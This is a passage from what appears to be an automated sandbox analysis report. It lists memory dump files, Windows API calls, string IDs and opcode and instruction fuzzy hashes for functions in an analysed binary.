• SwitchToThread.KERNEL32(?,-3333333333333333,?,?,00000001,00007FF6385E2BF0), ref: 00007FF6385E2476
• SwitchToThread.KERNEL32(?,-3333333333333333,?,?,00000001,00007FF6385E2BF0), ref: 00007FF6385E24A5
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: SwitchThread
• String ID:
• API String ID: 115865932-0
• Opcode ID: a7c3b3acc85dbb1306d2a48614d20bd405700b54c1824a1551ee36e42e7a688c
• Instruction ID: 23e85e7bd5d73b85b40acb1de205814a3f37780d41307bdc4e3050c7c4a194b5
• Opcode Fuzzy Hash: a7c3b3acc85dbb1306d2a48614d20bd405700b54c1824a1551ee36e42e7a688c
• Instruction Fuzzy Hash: B3E1C233A0968286EA90CF31D9406F977A5FB447A0F056232EA5E87B98DF7DF441D708
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ResetWatchWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 473789334-0
                                                                                                                                                                                                                                  • Opcode ID: 2a829564ebf833433eb3467ed6ceb505fe3d3f7be4c3edd56eb17aca68a46a26
                                                                                                                                                                                                                                  • Instruction ID: b5a611f49bbe11573f80ac8afe403576523a783384c04981cb9692a48090542d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a829564ebf833433eb3467ed6ceb505fe3d3f7be4c3edd56eb17aca68a46a26
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3862E133B18A46C6EA818F35A8402F463A1BF55798F145236E90EE37A1DF3EF445E708
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                  • API String ID: 0-1684325040
                                                                                                                                                                                                                                  • Opcode ID: f42896eb4206faa703cb764e800ba36d1296ddac80f2e4f34e0a0c9d7cab88ad
                                                                                                                                                                                                                                  • Instruction ID: a4c1590a6b4b5c1139ad3f2e7b9477cd3e69ba56b7980f3506f2c8f46a769a1a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f42896eb4206faa703cb764e800ba36d1296ddac80f2e4f34e0a0c9d7cab88ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C412E133A08A4682EB548F25E8102F9B364FF45BA4F544232DE5D87B94DF3EE449E708
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8a6563889edc6ecb99000e239c18098e2630ba3ca172422791c0019219a34539
                                                                                                                                                                                                                                  • Instruction ID: 4ebd887d82003cff6b5ab0aaaf20d36d3c3e07db4c262f0c15eabf45d53ec95f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a6563889edc6ecb99000e239c18098e2630ba3ca172422791c0019219a34539
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B527333609B85C6DAA08F25E5402EAB7E1FB947E4F140536EA8D83798DF3DE444DB08
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f5c4ca3a004020a5879dad05a38fc3f5894829dd430128e6ca150d3be7238627
                                                                                                                                                                                                                                  • Instruction ID: e5b738f4b270a59d9c220b3b81fc2f415fddfc1ceca65b78b9d68c2eab0afffa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5c4ca3a004020a5879dad05a38fc3f5894829dd430128e6ca150d3be7238627
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8842F773A19786C5DAA08F25E4402AAB7E0FB54BE4F144136EE9D83B94DF3EE480D704
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2050909247-0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(?,?,00000000,?,?,00007FF6385C63C6), ref: 00007FF6385CC4B3
• GetProcAddress.KERNEL32(?,?,00000000,?,?,00007FF6385C63C6), ref: 00007FF6385CC4C8
• GetEnabledXStateFeatures.KERNEL32(?,?,00000000,?,?,00007FF6385C63C6), ref: 00007FF6385CC4D5
• InitializeContext.KERNEL32(?,?,00000000,?,?,00007FF6385C63C6), ref: 00007FF6385CC514
• GetLastError.KERNEL32(?,?,00000000,?,?,00007FF6385C63C6), ref: 00007FF6385CC522
• InitializeContext.KERNEL32(?,?,00000000,?,?,00007FF6385C63C6), ref: 00007FF6385CC576
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                                                                                                                                                                                                                                  • String ID: InitializeContext2$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 4102459504-3117029998
                                                                                                                                                                                                                                  • Opcode ID: 842e09f64cc07bfb6ffd64536c8495c82e0dc7659d3a4692a5304d1c7e8fa001
                                                                                                                                                                                                                                  • Instruction ID: 3b53a57071e764805011acbcaa9e01400a959ec7120a9113d10cc851c3db7784
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 842e09f64cc07bfb6ffd64536c8495c82e0dc7659d3a4692a5304d1c7e8fa001
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0331A327E1874681FA41CB71F4402B963A1AF44BE2F440035D94D837A4EF7DF98AEB18
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SwitchThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 115865932-0
                                                                                                                                                                                                                                  • Opcode ID: 00941ea838a74927b3197646182d1b4c896bb44e28a752c980c972a9e3e74503
                                                                                                                                                                                                                                  • Instruction ID: 40326c3741b7f05389c5d2223811658a9cdf2185035a45b1c967578fe01f1f54
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00941ea838a74927b3197646182d1b4c896bb44e28a752c980c972a9e3e74503
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EA16A37E0C20387F6A48B35A861AF566A4AF447A5F144235EC1DC67E2DE2FF448B748
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SwitchThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 115865932-0
                                                                                                                                                                                                                                  • Opcode ID: 88eb812f930dea6f5c706f698e86da7a776b86059163763e11a76009e92a9a9a
                                                                                                                                                                                                                                  • Instruction ID: 3da960f62410dc70baf981d70b9daed8128f7fbefcea944cbb10d8633acb6a32
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88eb812f930dea6f5c706f698e86da7a776b86059163763e11a76009e92a9a9a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64816E33E081038BF6A45B359C516F56690AF407A4F0461B9E95CC63D2DE3FF841BB48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PerformanceQuery$Counter$BuffersFlushFrequencyProcessSwitchThreadWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3450244608-0
                                                                                                                                                                                                                                  • Opcode ID: c5ccaeed1bab535fe0671cbe44ddf89ccf1ec03c7d326c604e749402a2e002c3
                                                                                                                                                                                                                                  • Instruction ID: 70937428359165c69b75c16d96cb7bc1fecc7bb4120ab3382f88bee9f3444a6a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5ccaeed1bab535fe0671cbe44ddf89ccf1ec03c7d326c604e749402a2e002c3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B251E627E0964686EAA09F39E4411F927B0FB44BA0F541031EE4D87797DE3EE405EB44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
• String ID:
• API String ID: 510365852-0
• Opcode ID: 934f69260269b245a23ceac455eb61daf11befa2e70e304a3ab56caa06914c26
• Instruction ID: dd1a997f66ae2b309b2ab3dc4675d795a9ac4daa53d9a72cf27e0c5e57355cc2
• Opcode Fuzzy Hash: 934f69260269b245a23ceac455eb61daf11befa2e70e304a3ab56caa06914c26
• Instruction Fuzzy Hash: BA11F073E0974292EB88DB31B9412E9B3A0FB057A0F000139E75E87782DF79E461AB04
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: ExceptionFailFastRaise
• String ID: Process is terminating due to StackOverflowException.
• API String ID: 2546344036-2200901744
• Opcode ID: 75cf4704885808f0eb6ff8b498a01ad86faee032c79342b798ce3843b52c74cb
• Instruction ID: 9ae97e5a9053eecd946e12736578785b5fd6d12e6172010628c9714d46dfd007
• Opcode Fuzzy Hash: 75cf4704885808f0eb6ff8b498a01ad86faee032c79342b798ce3843b52c74cb
• Instruction Fuzzy Hash: 8951D927E0868281EF908B25D4407F823F1EF49BA5F455136DA1FC3792DF2EE546A708
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(?,?,?,?,00000000,00007FF638604BED,?,?,00081000,00007FF6385F248C), ref: 00007FF638604B42
• GetProcAddress.KERNEL32(?,?,?,?,00000000,00007FF638604BED,?,?,00081000,00007FF6385F248C), ref: 00007FF638604B5C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetEnabledXStateFeatures$kernel32.dll
• API String ID: 2574300362-4754247
• Opcode ID: b6381558ee1b1e5cbd9979c419058fd06f1e19c69f60cab78635965a1811dbf7
• Instruction ID: 5965a3544e525cd43bc6411a3651e63aaf011a6f9b64e05a90711ac4c4bbcead
• Opcode Fuzzy Hash: b6381558ee1b1e5cbd9979c419058fd06f1e19c69f60cab78635965a1811dbf7
• Instruction Fuzzy Hash: 1721D293F2C16242FFB88634E0523F912D39B45799F448439C90EC2785EE1EEA90B60C
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
